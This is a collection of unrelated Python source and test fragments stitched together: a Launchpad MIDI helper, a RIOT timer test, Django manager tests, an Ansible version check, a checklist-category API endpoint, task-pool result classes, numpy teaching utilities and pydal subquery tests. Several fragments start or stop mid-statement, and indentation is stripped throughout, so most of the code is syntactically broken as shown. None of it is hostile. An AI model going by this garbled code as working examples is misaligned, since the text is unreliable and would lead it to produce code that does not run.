yellow = 51 # better not to use 127
# If you want a darker variant of the above, use fractions (thirds).
# For example, green*2/3 is darker green. (Not for orange!)
def color(g, r):
"This gives the Launchpad color given the amount of green and red."
if g + r == 0:
return black # not zero
else:
return (16 * g) + r
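# Sanity checks for the constants above: color(3, 0) == 48 == green,
# color(0, 3) == 3 == red, color(3, 3) == 51 == yellow, and
# color(0, 0) returns the non-zero black sentinel 4.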
# KEYS
# Each key on the Launchpad is activated by a MIDI event.
# The square keys and the right keys are notes,
# the top keys are control events.
# Functions giving the row and column of a key (counting from 0)
def row(x):
"This tells the row of the event (square or right)"
return x // step
def column(x):
"This tells us the column of event (right = 8)"
return x % step
def topcol(x):
"The same as colums, but for the top row"
return x - FirstCtrl
# Now the inverses: functions that point exactly to a key on the Launchpad
def right(row):
"This gives the note of a right key at position row"
return (row * step) + 8
def square(row, col):
"This gives the note of a square key at position row,col"
return (row * step) + col
def top(col):
"This gives the ctrl of a top key at position col"
return col + FirstCtrl
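# Worked example: square(2, 3) == 2*16 + 3 == 35, and conversely
# row(35) == 2, column(35) == 3; top(0) == 104 == FirstCtrl.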
# KEY FILTERS
# First filters for notes from square, top, and right keys.
OnlySquare = Filter(NOTE) >> KeyFilter(notes=[square(i, j)
for i in side for j in side])
OnlyRight = KeyFilter(notes=[right(i) for i in side])
OnlyTop = Filter(CTRL) >> CtrlFilter(FirstCtrl + i for i in side)
# Now filters for rows, columns, and single keys.
def RowSqFilter(row):
"This selects only notes from specified row"
return KeyFilter(row * step, right(row)) # no right
def RowFilter(row):
"This selects only notes from specified row"
return KeyFilter(row * step, right(row) + 1) # also right
def ColumnFilter(col):
"This selects only notes from specified column"
return KeyFilter(notes=[square(i, col) for i in side])
def TopFilter(col):
"This selects only specified key from top row"
return CtrlFilter(top(col))
def RightFilter(row):
"This selects only specified key from right"
return KeyFilter(right(row))
def SquareFilter(row, col):
"This selects only specified key from square"
return KeyFilter(square(row, col))
# KEY GENERATORS
def SquareKey(row, col):
"This creates square note with given row and column"
return Key(square(row, col))
def RightKey(row):
"This creates right note with given row"
return Key(right(row))
def TopKey(col, val):
"This creates top ctrl with given column"
return Ctrl(top(col), val)
# NOTES
A = 21
B = 23
C = 24
D = 26
E = 28
F = 29
G = 31
Octave = 12 # semitones
minors = { # scale
0: 0, # interval in semitones
1: 2,
2: 3,
3: 5,
4: 7,
5: 8,
6: 10,
7: 12,
}
minharms = { # scale
0: 0, # interval in semitones
1: 2,
2: 3,
3: 5,
4: 7,
5: 8,
6: 10,
7: 11, # harmonic
}
majors = {
0: 0,
1: 2,
2: 4,
3: 5,
4: 7,
5: 9,
    6: 11,
7: 12,
}
dorics = {
0: 0,
1: 2,
2: 3,
3: 5,
4: 7,
5: 9,
6: 10,
7: 12,
}
phrygians = {
0: 0,
1: 1,
2: 3,
    3: 5,
4: 7,
5: 8,
6: 10,
7: 12,
}
# I only use these scales - feel free to add your own!
# Now the same thing, but to feed into Transpose:
Minor = [minors[i] - i for i in side]
MinHarm = [minharms[i] - i for i in side]
Major = [majors[i] - i for i in side]
Doric = [dorics[i] - i for i in side]
Phrygian = [phrygians[i] - i for i in side]
# How to use it in practice:
def OctFilter(col, tonic):
return KeyFilter(notes=[(tonic + col + (i * Octave)) for i in longside])
def MakeScale(tonic, scale):
    return [OctFilter(i, tonic) >> Transpose(scale[i]) for i in side]
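# Usage sketch (tonic illustrative): build a minor scale rooted at middle C
# (MIDI note 60). Each element of the returned list filters one chromatic
# offset (repeated across octaves) and transposes it onto its scale degree.
#   c_minor = MakeScale(60, Minor)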
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
# Copyright (C) 2017 Francisco Acosta <francisco.acosta@inria.fr>
# 2017 Freie Universität Berlin
#
# This file is subject to the terms and conditions of the GNU Lesser
# General Public License v2.1. See the file LICENSE in the top level
# directory for more details.
import sys
import time
from testrunner import run
US_PER_SEC = 1000000
INTERNAL_JITTER = 0.05
EXTERNAL_JITTER = 0.15
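# Example: with INTERNAL_JITTER = 0.05, a sleep expected to take 1000 us
# passes only if the measured time falls strictly between 1000 and 1050 us.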
class InvalidTimeout(Exception):
pass
def testfunc(child):
child.expect(u"Running test (\\d+) times with (\\d+) distinct sleep times")
RUNS = int(child.match.group(1))
SLEEP_TIMES_NUMOF = int(child.match.group(2))
try:
        child.expect_exact(u"Please hit any key and then ENTER to continue")
child.sendline(u"a")
start_test = time.time()
for m in range(RUNS):
for n in range(SLEEP_TIMES_NUMOF):
child.expect(u"Slept for (\\d+) us \\(expected: (\\d+) us\\) Offset: (-?\\d+) us")
sleep_time = int(child.match.group(1))
exp = int(child.match.group(2))
upper_bound = exp + (exp * INTERNAL_JITTER)
if not (exp < sleep_time < upper_bound):
delta = (upper_bound-exp)
error = min(upper_bound-sleep_time, sleep_time-exp)
raise InvalidTimeout("Invalid timeout %d, expected %d < timeout < %d"
"\nHost max error\t%d\nerror\t\t%d" %
(sleep_time, exp, upper_bound,
delta, error))
testtime = (time.time() - start_test) * US_PER_SEC
child.expect(u"Test ran for (\\d+) us")
exp = int(child.match.group(1))
lower_bound = exp - (exp * EXTERNAL_JITTER)
upper_bound = exp + (exp * EXTERNAL_JITTER)
if not (lower_bound < testtime < upper_bound):
raise InvalidTimeout("Host timer measured %d us (client measured %d us)" %
(testtime, exp))
except InvalidTimeout as e:
print(e)
sys.exit(1)
if __name__ == "__main__":
sys.exit(run(testfunc))
from flask import g
import re
from sqlalchemy import and_
from sqlalchemy.orm.exc import NoResultFound
from newparp.model import (
CharacterTag,
Tag,
)
special_char_regex = re.compile("[\\ \\./]+")
underscore_strip_regex = re.compile("^_+|_+$")
def name_from_alias(alias):
# 1. Change to lowercase.
# 2. Change spaces to underscores.
# 3. Change . and / to underscores because they screw up the routing.
# 4. Strip extra underscores from the start and end.
return underscore_strip_regex.sub(
"",
special_char_regex.sub("_", alias)
).lower()
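# Examples (aliases hypothetical):
#   name_from_alias("John Smith")    -> "john_smith"
#   name_from_alias("a.b/c")         -> "a_b_c"
#   name_from_alias("__Trailing__")  -> "trailing"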
def character_tags_from_form(form):
tag_dict = {}
for tag_type in ("fandom", "character", "gender"):
        for alias in form[tag_type].split(","):
alias = alias.strip()
if alias == "":
continue
name = name_from_alias(alias)
if name == "":
continue
tag_dict[(tag_type, name)] = alias
character_tags = []
used_ids = set()
for (tag_type, name), alias in tag_dict.items():
try:
            tag = g.db.query(Tag).filter(and_(
Tag.type == tag_type, Tag.name == name,
)).one()
except NoResultFound:
tag = Tag(type=tag_type, name=name)
g.db.add(tag)
g.db.flush()
tag_id = (tag.synonym_id or tag.id)
# Remember IDs to skip synonyms.
if tag_id in used_ids:
continue
used_ids.add(tag_id)
character_tags.append(CharacterTag(tag_id=tag_id, alias=alias))
return character_tags
        self.test_removal_through_default_gfk_related_manager(bulk=False)
def test_removal_through_specified_gfk_related_manager(self, bulk=True):
Person.objects.create(first_name="Bugs", last_name="Bunny", fun=True, favorite_thing=self.b1)
droopy = Person.objects.create(first_name="Droopy", last_name="Dog", fun=False, favorite_thing=self.b1)
# The fun manager DOESN'T remove boring people.
self.b1.favorite_things(manager='fun_people').remove(droopy, bulk=bulk)
self.assertQuerysetEqual(
self.b1.favorite_things(manager='boring_people').all(), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
# The boring manager DOES remove boring people.
self.b1.favorite_things(manager='boring_people').remove(droopy, bulk=bulk)
self.assertQuerysetEqual(
self.b1.favorite_things(manager='boring_people').all(), [
],
lambda c: c.first_name,
ordered=False,
)
droopy.favorite_thing = self.b1
droopy.save()
# The fun manager ONLY clears fun people.
self.b1.favorite_things(manager='fun_people').clear(bulk=bulk)
self.assertQuerysetEqual(
self.b1.favorite_things(manager='boring_people').all(), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.favorite_things(manager='fun_people').all(), [
],
lambda c: c.first_name,
ordered=False,
)
def test_slow_removal_through_specified_gfk_related_manager(self):
self.test_removal_through_specified_gfk_related_manager(bulk=False)
def test_removal_through_default_m2m_related_manager(self):
bugs = FunPerson.objects.create(first_name="Bugs", last_name="Bunny", fun=True)
self.b1.fun_authors.add(bugs)
droopy = FunPerson.objects.create(first_name="Droopy", last_name="Dog", fun=False)
self.b1.fun_authors.add(droopy)
self.b1.fun_authors.remove(droopy)
self.assertQuerysetEqual(
self.b1.fun_authors.through._default_manager.all(), [
"Bugs",
"Droopy",
],
lambda c: c.funperson.first_name,
ordered=False,
)
self.b1.fun_authors.remove(bugs)
self.assertQuerysetEqual(
self.b1.fun_authors.through._default_manager.all(), [
"Droopy",
],
lambda c: c.funperson.first_name,
ordered=False,
)
self.b1.fun_authors.add(bugs)
self.b1.fun_authors.clear()
self.assertQuerysetEqual(
self.b1.fun_authors.through._default_manager.all(), [
"Droopy",
],
lambda c: c.funperson.first_name,
ordered=False,
)
def test_removal_through_specified_m2m_related_manager(self):
bugs = Person.objects.create(first_name="Bugs", last_name="Bunny", fun=True)
self.b1.authors.add(bugs)
droopy = Person.objects.create(first_name="Droopy", last_name="Dog", fun=False)
self.b1.authors.add(droopy)
# The fun manager DOESN'T remove boring people.
self.b1.authors(manager='fun_people').remove(droopy)
self.assertQuerysetEqual(
self.b1.authors(manager='boring_people').all(), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
# The boring manager DOES remove boring people.
self.b1.authors(manager='boring_people').remove(droopy)
self.assertQuerysetEqual(
self.b1.authors(manager='boring_people').all(), [
],
lambda c: c.first_name,
ordered=False,
)
self.b1.authors.add(droopy)
        # The fun manager ONLY clears fun people.
self.b1.authors(manager='fun_people').clear()
self.assertQuerysetEqual(
self.b1.authors(manager='boring_people').all(), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
            self.b1.authors(manager='fun_people').all(), [
],
lambda c: c.first_name,
ordered=False,
)
def test_deconstruct_default(self):
mgr = models.Manager()
as_manager, mgr_path, qs_path, args, kwargs = mgr.deconstruct()
self.assertFalse(as_manager)
self.assertEqual(mgr_path, 'django.db.models.manager.Manager')
self.assertEqual(args, ())
self.assertEqual(kwargs, {})
def test_deconstruct_as_manager(self):
mgr = CustomQuerySet.as_manager()
as_manager, mgr_path, qs_path, args, kwargs = mgr.deconstruct()
self.assertTrue(as_manager)
self.assertEqual(qs_path, 'custom_managers.models.CustomQuerySet')
def test_deconstruct_from_queryset(self):
mgr = DeconstructibleCustomManager('a', 'b')
as_manager, mgr_path, qs_path, args, kwargs = mgr.deconstruct()
self.assertFalse(as_manager)
self.assertEqual(mgr_path, 'custom_managers.models.DeconstructibleCustomManager')
self.assertEqual(args, ('a', 'b',))
self.assertEqual(kwargs, {})
mgr = DeconstructibleCustomManager('x', 'y', c=3, d=4)
as_manager, mgr_path, qs_path, args, kwargs = mgr.deconstruct()
self.assertFalse(as_manager)
self.assertEqual(mgr_path, 'custom_managers.models.DeconstructibleCustomManager')
self.assertEqual(args, ('x', 'y',))
self.assertEqual(kwargs, {'c': 3, 'd': 4})
def test_deconstruct_from_queryset_failing(self):
mgr = CustomManager('arg')
msg = ("Could not find manager BaseCustomManagerFromCustomQuerySet in "
"django.db.models.manager.\n"
"Please note that you need to inherit from managers you "
"dynamically generated with 'from_queryset()'.")
with self.assertRaisesMessage(ValueError, msg):
mgr.deconstruct()
def test_abstract_model_with_custom_manager_name(self):
"""
A custom manager may be defined on an abstract model.
It will be inherited by the abstract model's children.
"""
PersonFromAbstract.abstract_persons.create(objects='Test')
self.assertQuerysetEqual(
PersonFromAbstract.abstract_persons.all(), ["Test"],
lambda c: c.objects,
)
class TestCars(TestCase):
def test_managers(self):
# Each model class gets a "_default_manager" attribute, which is a
# reference to the first manager defined in the class.
Car.cars.create(name="Corvette", mileage=21, top_speed=180)
Car.cars.create(name="Neon", mileage=31, top_speed=100)
self.assertQuerysetEqual(
Car._default_manager.order_by("name"), [
"Corvette",
"Neon",
],
lambda c: c.name
)
self.assertQuerysetEqual(
Car.cars.order_by("name"), [
"Corvette",
"Neon",
],
lambda c: c.name
)
# alternate manager
self.assertQuerysetEqual(
Car.fast_cars.all(), [
"Corvette",
],
lambda c: c.name
)
# explicit default manager
self.assertQuerysetEqual(
FastCarAsDefault.cars.order_by("name"), [
"Corvette",
"Neon",
],
lambda c: c.name
)
self.assertQuerysetEqual(
FastCarAsDefault._default_manager.all(), [
"Corvette",
],
lambda c: c.name
)
# explicit base manager
self.assertQuerysetEqual(
FastCarAsBase.cars.order_by("name"), [
"Corvette",
"Neon",
],
lambda c: c.name
)
self.assertQuerysetEqual(
FastCarAsBase._base_manager.all(), [
    "Corvette",
],
    lambda c: c.name
)
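# Editor's note: a minimal sketch of the models these assertions assume; the
# first manager declared on the class is what Django exposes as
# Car._default_manager (the FastCarManager threshold below is an assumption,
# chosen so that only the Corvette, top speed 180, qualifies):
#
#     class FastCarManager(models.Manager):
#         def get_queryset(self):
#             return super().get_queryset().filter(top_speed__gt=150)
#
#     class Car(models.Model):
#         name = models.CharField(max_length=10)
#         mileage = models.IntegerField()
#         top_speed = models.IntegerField()
#         cars = models.Manager()        # declared first -> _default_manager
#         fast_cars = FastCarManager()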
|
def hello_world():
"Function that says hello."
print("Hello, world!")
| |
#!/usr/bin/env python
from runtest import TestBase
class TestCase(TestBase):
def __init__(self):
TestBase.__init__(self, 'abc', """
# DURATION TID FUNCTION
62.202 us [28141] | __cxa_atexit();
[28141] | main() {
[28141] | a() {
[28141] | b() {
[28141] | c() {
0.753 us [28141] | getpid();
1.430 us [28141] | } /* c */
1.915 us [28141] | } /* b */
2.405 us [28141] | } /* a */
3.005 us [28141] | } /* main */
""")
|
# -*- coding: utf8 -*-
"""
The ``dbs`` module
===================
Contains all functions to access the main site db or any SQLite db, in a secure way
"""
import sqlalchemy
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.sql import join
__all__ = ['join', 'create_engine_session', 'auto_map_orm']
def create_engine_session(engine_url, echo=True):
"""
Create a SQLAlchemy engine and session.
engine_url is an RFC 1738 compliant database URL, see
http://docs.sqlalchemy.org/en/latest/dialects/index.html
:param engine_url: database URL
:param echo: if True, log all emitted SQL statements
:return: (engine, session) tuple
"""
engine = sqlalchemy.create_engine(engine_url, echo=echo)
session_class = sessionmaker(bind=engine)
session = session_class()
return engine, session
def auto_map_orm(engine):
    """Reflect the schema from engine and return the automapped base."""
    base_class = automap_base()
    base_class.prepare(engine, reflect=True)
    return base_class
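# Editor's usage sketch for the two helpers above; the SQLite URL and the
# "users" table name are illustrative assumptions, not part of this module:
if __name__ == '__main__':
    engine, session = create_engine_session('sqlite:///example.db', echo=False)
    base = auto_map_orm(engine)
    # automap exposes one mapped class per reflected table
    User = base.classes.users
    print(session.query(User).count())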
|
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible import __version__
from ansible.errors import AnsibleError
from distutils.version import LooseVersion
from operator import eq, ge, gt
from sys import version_info
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
version_requirement = '2.5.0.0'
version_tested_max = '2.7.5'
python3_required_version = '2.5.3'
if version_info[0] == 3 and not ge(LooseVersion(__version__), LooseVersion(python3_required_version)):
raise AnsibleError(('Ansible >= {} is required when using Python 3.\n'
'Either downgrade to Python 2 or update your Ansible version to {}.').format(python3_required_version, python3_required_version))
if not ge(LooseVersion(__version__), LooseVersion(version_requirement)):
raise AnsibleError(('Trellis no longer supports Ansible {}.\n'
'Please upgrade to Ansible {} or higher.').format(__version__, version_requirement))
elif gt(LooseVersion(__version__), LooseVersion(version_tested_max)):
display.warning(u'Your Ansible version is {} but this version of Trellis has only been tested for '
                u'compatibility with Ansible {} -> {}. It is advisable to check for Trellis updates or '
                u'downgrade your Ansible version.'.format(__version__, version_requirement, version_tested_max))
if eq(LooseVersion(__version__), LooseVersion('2.5.0')):
display.warning(u'Your Ansible version is {}. Consider upgrading your Ansible version to avoid '
u'erroneous warnings such as `Removed restricted key from module data...`'.format(__version__))
# Import BaseVarsPlugin after Ansible version check.
# Otherwise import error for Ansible versions older than 2.4 would prevent display of version check message.
from ansible.plugins.vars import BaseVarsPlugin
class VarsModule(BaseVarsPlugin):
def get_vars(self, loader, path, entities, cache=True):
return {}
|
from gasistafelice.rest.views.blocks.base import BlockWithList
from django.utils.translation import ugettext as _, ugettext_lazy as _lazy
#------------------------------------------------------------------------------#
# #
#------------------------------------------------------------------------------#
class Block(BlockWithList):
BLOCK_NAME = "account_state"
BLOCK_DESCRIPTION = _("Economic state")
BLOCK_VALID_RESOURCE_TYPES = ["gas", "site"]
def _get_resource_list(self, request):
return request.resource.accounts
# TODO fero CHECK
# THIS IS USEFUL FOR USER ACTIONS: add/update/delete
# # Calculate allowed user actions
# #
# user_actions = []
#
# if settings.CAN_CHANGE_CONFIGURATION_VIA_WEB == True:
# user = request.user
# if can_write_to_resource(user,res):
# if resource_type in ['container', 'node', 'target', 'measure']:
#
# if (resource_type in ['target', 'measure']):
# if res.suspended:
# user_actions.append('resume')
# else:
# user_actions.append('suspend')
# else:
# user_actions.append('resume')
# user_actions.append('suspend')
# TODO fero CHECK
# THIS IS USEFUL FOR ADD/REMOVE NEW GAS
# elif args == "new_note":
# return self.add_new_note(request, resource_type, resource_id)
# elif args == "remove_note":
# return self.remove_note(request, resource_type, resource_id)
#------------------------------------------------------------------------------#
# #
#------------------------------------------------------------------------------#
# TODO fero CHECK
# THIS IS USEFUL FOR ADD/REMOVE NEW GAS
# def add_new_note(self,request, resource_type, resource_id):
# resource = request.resource
#
# if request.POST:
#
# #title = request.REQUEST.get('title');
# body = request.REQUEST.get('body');
#
# new_comment = Comment(content_object = resource
# ,site = DjangoSite.objects.all()[0]
# ,user = request.user
# ,user_name = request.user.username
# ,user_email = request.user.email
# ,user_url = ''
# ,comment = body
# ,ip_address = None
# ,is_public = True
# ,is_removed = False
# )
#
# new_comment.save()
#
# return HttpResponse('<div id="response" resource_type="%s" resource_id="%s" class="success">ok</div>' % (resource.resource_type, resource.id))
#
# return HttpResponse('')
#
# #------------------------------------------------------------------------------#
# # #
# #------------------------------------------------------------------------------#
#
# def remove_note(self, request, resource_type, resource_id):
#
# resource = request.resource
#
# note_id = request.REQUEST.get('note_id')
#
# note = Comment.objects.get(id=note_id)
# note.delete()
#
# return HttpResponse('<div id="response" resource_type="%s" resource_id="%s" class="success">ok</div>' % (resource.resource_type, resource.id))
|
import unittest
import os
from test.aiml_tests.client import TestClient
from programy.config.brain import BrainFileConfiguration
class BasicTestClient(TestClient):
def __init__(self):
TestClient.__init__(self)
def load_configuration(self, arguments):
super(BasicTestClient, self).load_configuration(arguments)
self.configuration.brain_configuration._aiml_files = BrainFileConfiguration(files=os.path.dirname(__file__))
self.configuration.brain_configuration._person = os.path.dirname(__file__)+"/person.txt"
class PersonAIMLTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
PersonAIMLTests.test_client = BasicTestClient()
def test_person(self):
response = PersonAIMLTests.test_client.bot.ask_question("test", "TEST PERSON")
self.assertIsNotNone(response)
self.assertEqual(response, "This is your2 cat")
|
#!/usr/bin/python
########################################################################
# 1 August 2014
# Patrick Lombard, Centre for Stem Cell Research
# Core Bioinformatics Group
# University of Cambridge
# All rights reserved.
########################################################################
import pychiptools.call_diff_bind
pychiptools.call_diff_bind.main()
|
from flask import request
from flask_restplus import Resource
from skf.api.security import security_headers, validate_privilege
from skf.api.checklist_category.business import update_checklist_category
from skf.api.checklist_category.serializers import checklist_type_update, message
from skf.api.kb.parsers import authorization
from skf.api.restplus import api
from skf.api.security import log, val_num, val_alpha, val_alpha_num, val_alpha_num_special
ns = api.namespace('checklist_category', description='Operations related to checklist categories')
@ns.route('/update/<int:id>')
@api.doc(params={'id': 'The checklist category id'})
@api.response(404, 'Validation error', message)
class ChecklistCategoryUpdate(Resource):
@api.expect(authorization, checklist_type_update)
@api.response(400, 'No results found', message)
def put(self, id):
"""
Update a checklist category.
* Privileges required: **edit**
"""
data = request.json
val_num(id)
val_alpha_num_special(data.get('name'))
val_alpha_num_special(data.get('description'))
validate_privilege(self, 'edit')
result = update_checklist_category(id, data)
return result, 200, security_headers()
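# Editor's sketch of a matching request; the payload keys mirror the
# validators above, and the header name and token value are placeholders
# taken from the imported `authorization` parser:
#
#     PUT /checklist_category/update/1
#     Authorization: <JWT token>
#     {"name": "Authentication", "description": "Authentication verification checks"}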
|
)`
#
class ApplyResult(object):
_worker_lost = None
_write_to = None
_scheduled_for = None
def __init__(self, cache, callback, accept_callback=None,
timeout_callback=None, error_callback=None, soft_timeout=None,
timeout=None, lost_worker_timeout=LOST_WORKER_TIMEOUT,
on_timeout_set=None, on_timeout_cancel=None,
callbacks_propagate=(), send_ack=None,
correlation_id=None):
self.correlation_id = correlation_id
self._mutex = Lock()
self._event = threading.Event()
self._job = next(job_counter)
self._cache = cache
self._callback = callback
self._accept_callback = accept_callback
self._error_callback = error_callback
self._timeout_callback = timeout_callback
self._timeout = timeout
self._soft_timeout = soft_timeout
self._lost_worker_timeout = lost_worker_timeout
self._on_timeout_set = on_timeout_set
self._on_timeout_cancel = on_timeout_cancel
self._callbacks_propagate = callbacks_propagate or ()
self._send_ack = send_ack
self._accepted = False
self._cancelled = False
self._worker_pid = None
self._time_accepted = None
self._terminated = None
cache[self._job] = self
def __repr__(self):
return '<Result: {id} ack:{ack} ready:{ready}>'.format(
id=self._job, ack=self._accepted, ready=self.ready(),
)
def ready(self):
return self._event.isSet()
def accepted(self):
return self._accepted
def successful(self):
assert self.ready()
return self._success
def _cancel(self):
"""Only works if synack is used."""
self._cancelled = True
def discard(self):
self._cache.pop(self._job, None)
def terminate(self, signum):
self._terminated = signum
def _set_terminated(self, signum=None):
try:
raise Terminated(-(signum or 0))
except Terminated:
self._set(None, (False, ExceptionInfo()))
def worker_pids(self):
return [self._worker_pid] if self._worker_pid else []
def wait(self, timeout=None):
self._event.wait(timeout)
def get(self, timeout=None):
self.wait(timeout)
if not self.ready():
raise TimeoutError
if self._success:
return self._value
else:
raise self._value.exception
def safe_apply_callback(self, fun, *args, **kwargs):
if fun:
try:
fun(*args, **kwargs)
except self._callbacks_propagate:
raise
except Exception as exc:
error('Pool callback raised exception: %r', exc,
exc_info=1)
def handle_timeout(self, soft=False):
if self._timeout_callback is not None:
self.safe_apply_callback(
self._timeout_callback, soft=soft,
timeout=self._soft_timeout if soft else self._timeout,
)
def _set(self, i, obj):
with self._mutex:
if self._on_timeout_cancel:
self._on_timeout_cancel(self)
self._success, self._value = obj
self._event.set()
if self._accepted:
# if not accepted yet, then the set message
# was received before the ack, which means
# the ack will remove the entry.
self._cache.pop(self._job, None)
# apply callbacks last
if self._callback and self._success:
self.safe_apply_callback(
self._callback, self._value)
if (self._value is not None and
self._error_callback and not self._success):
self.safe_apply_callback(
self._error_callback, self._value)
def _ack(self, i, time_accepted, pid, synqW_fd):
with self._mutex:
if self._cancelled and self._send_ack:
self._accepted = True
if synqW_fd:
return self._send_ack(NACK, pid, self._job, synqW_fd)
return
self._accepted = True
self._time_accepted = time_accepted
self._worker_pid = pid
if self.ready():
# ack received after set()
self._cache.pop(self._job, None)
if self._on_timeout_set:
self._on_timeout_set(self, self._soft_timeout, self._timeout)
response = ACK
if self._accept_callback:
try:
self._accept_callback(pid, time_accepted)
except self._callbacks_propagate:
response = NACK
raise
except Exception:
response = NACK
# ignore other errors
finally:
if self._send_ack and synqW_fd:
return self._send_ack(
response, pid, self._job, synqW_fd
)
if self._send_ack and synqW_fd:
self._send_ack(response, pid, self._job, synqW_fd)
#
# Class whose instances are returned by `Pool.map_async()`
#
class MapResult(ApplyResult):
def __init__(self, cache, chunksize, length, callback, error_callback):
ApplyResult.__init__(
self, cache, callback, error_callback=error_callback,
)
self._success = True
self._length = length
self._value = [None] * length
self._accepted = [False] * length
self._worker_pid = [None] * length
self._time_accepted = [None] * length
self._chunksize = chunksize
if chunksize <= 0:
self._number_left = 0
self._event.set()
del cache[self._job]
else:
self._number_left = length // chunksize + bool(length % chunksize)
def _set(self, i, success_result):
success, result = success_result
if success:
self._value[i * self._chunksize:(i + 1) * self._chunksize] = result
self._number_left -= 1
if self._number_left == 0:
if self._callback:
self._callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
else:
self._success = False
self._value = result
if self._error_callback:
self._error_callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
def _ack(self, i, time_accepted, pid, *args):
start = i * self._chunksize
stop = min((i + 1) * self._chunksize, self._length)
for j in range(start, stop):
self._accepted[j] = True
self._worker_pid[j] = pid
self._time_accepted[j] = time_accepted
if self.ready():
self._cache.pop(self._job, None)
def accepted(self):
return all(self._accepted)
def worker_pids(self):
return [pid for pid in self._worker_pid if pid]
#
# Class whose instances are returned by `Pool.imap()`
#
class IMapIterator(object):
_worker_lost = None
def __init__(self, cache, lost_worker_timeout=LOST_WORKER_TIMEOUT):
self._cond = threading.Condition(threading.Lock())
self._job = next(job_counter)
self._cache = cache
self._items = deque()
self._index = 0
self._length = None
self._ready = False
self._unsorted = {}
self._worker_pids = []
self._lost_worker_timeout = lost_worker_timeout
cache[self._job] = self
def __iter__(self):
return self
def next(self, timeout=None):
with self._cond:
try:
item = self._items.popleft()
except IndexError:
if self._index == self._length:
self._ready = True
|
# coding: utf-8
# numpy_utils for Intro to Data Science with Python
# Author: Kat Chuang
# Created: Nov 2014
# --------------------------------------
import numpy
## Stage 2 begin
fieldNames = ['', 'id', 'priceLabel', 'name','brandId', 'brandName', 'imageLink',
'desc', 'vendor', 'patterned', 'material']
dataTypes = [('myint', 'i'), ('myid', 'i'), ('price', 'f8'), ('name', 'a200'),
('brandId', '<i8'), ('brandName', 'a200'), ('imageUrl', '|S500'),
('description', '|S900'), ('vendor', '|S100'), ('pattern', '|S50'), ('material', '|S50'), ]
def load_data(filename):
my_csv = numpy.genfromtxt(filename, delimiter='\t', skip_header=1,
names=fieldNames, invalid_raise=False,
dtype=dataTypes)
return my_csv
#2.a count
def size(my_csv):
print("Length (numpy): {}".format(my_csv.size))
#2.b sum
def calculate_numpy_sum(my_field):
field_in_float = [float(item) for item in my_field]
total = numpy.sum(field_in_float)
return total
#2.c mean
def find_numpy_average(my_field):
field_in_float = [float(item) for item in my_field]
total = calculate_numpy_sum(field_in_float)
size = len(my_field)
average = total / size
return average
#2.d max, min
def numpy_max(my_field_in_float):
return numpy.amax(my_field_in_float)
def numpy_min(my_field_in_float):
return numpy.amin(my_field_in_float)
## Stage 2 end
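# Editor's usage sketch for the Stage 2 helpers above; 'ties.tsv' is an
# assumed tab-separated input with one header row:
#
#     my_csv = load_data('ties.tsv')
#     size(my_csv)                                # record count
#     prices = my_csv[my_csv.dtype.names[2]]      # third column holds the price
#     print(find_numpy_average(prices))
#     print(numpy_max(prices), numpy_min(prices))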
# --------------------------------------
## Stage 3 begin
from my_utils import filter_col_by_string, filter_col_by_float
## Stage 3 end
# --------------------------------------
## Stage 4 begin
from my_utils import write_to_file, write_brand_and_price_to_file
## Stage 4 end
# --------------------------------------
## Stage 5 begin
import matplotlib.pyplot as plt
plt.style.use('ggplot')
def plot_all_bars(prices_in_float, exported_figure_filename):
    fig = plt.figure()
    ax = fig.add_subplot(1, 1, 1)
    prices = list(map(int, prices_in_float))
X = numpy.arange(len(prices))
width = 0.25
ax.bar(X+width, prices, width)
ax.set_xlim([0, 5055])
fig.savefig(exported_figure_filename)
def create_chart_for_embed(sample, title):
prices = sorted(map(int, sample))
x_axis_ticks = list( range(len(sample)) )
plt.plot(x_axis_ticks, prices, 'g', label='price points', linewidth=2)
def export_chart(sample, title):
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
prices = sorted(map(int, sample))
x_axis_ticks = list( range(len(sample)) )
ax.plot(x_axis_ticks, prices, 'g', label='price points', linewidth=2)
ax.set_title(title)
ax.set_xlabel(title)
ax.set_ylabel('Number of Ties')
if len(prices) > 20:
ax.set_xlim([0, round(len(prices), -1)])
else:
ax.set_xlim([0, len(prices)])
fig.savefig('_charts/' + title + '.png')
def prices_of_list(sampleData):
temp_list = []
for row in sampleData[1:]:
priceCol = float(row[2])
temp_list.append(priceCol)
return temp_list
## Stage 5 end
# --------------------------------------
## Stage 6 begin
## Stage 6 end
# --------------------------------------
|
[dict(aa=1), dict(aa=3)])
def testCorrelated(self):
db = self.connect()
db.define_table(
"t1", Field("aa", "integer"), Field("bb"), Field("mark", "integer")
)
db.define_table("t2", Field("aa", "integer"), Field("cc"))
db.define_table("t3", Field("aa", "integer"))
data_t1 = [
dict(aa=1, bb="bar"),
dict(aa=1, bb="foo"),
dict(aa=2, bb="foo"),
dict(aa=2, bb="test"),
dict(aa=3, bb="baz"),
dict(aa=3, bb="foo"),
]
data_t2 = [dict(aa=1, cc="foo"), dict(aa=2, cc="bar"), dict(aa=3, cc="baz")]
expected_cor = [(1, "foo"), (3, "baz")]
expected_leftcor = [(1, "foo"), (2, None), (3, "baz")]
expected_uncor = [(1, "bar"), (1, "foo"), (2, "foo"), (3, "baz"), (3, "foo")]
for item in data_t1:
db.t1.insert(**item)
for item in data_t2:
db.t2.insert(**item)
db.t3.insert(aa=item["aa"])
# Correlated subqueries
subquery = db.t1.aa == db.t2.aa
subfields = [db.t2.cc]
sub = db(subquery).nested_select(*subfields).with_alias("sub")
query = db.t1.bb.belongs(sub)
order = db.t1.aa | db.t1.bb
result = db(query).select(db.t1.aa, db.t1.bb, orderby=order)
self.assertEqual(len(result), len(expected_cor))
for idx, val in enumerate(expected_cor):
self.assertEqual(result[idx]["aa"], val[0])
self.assertEqual(result[idx]["bb"], val[1])
join = [db.t1.on((db.t3.aa == db.t1.aa) & db.t1.bb.belongs(sub))]
order = db.t3.aa | db.t1.bb
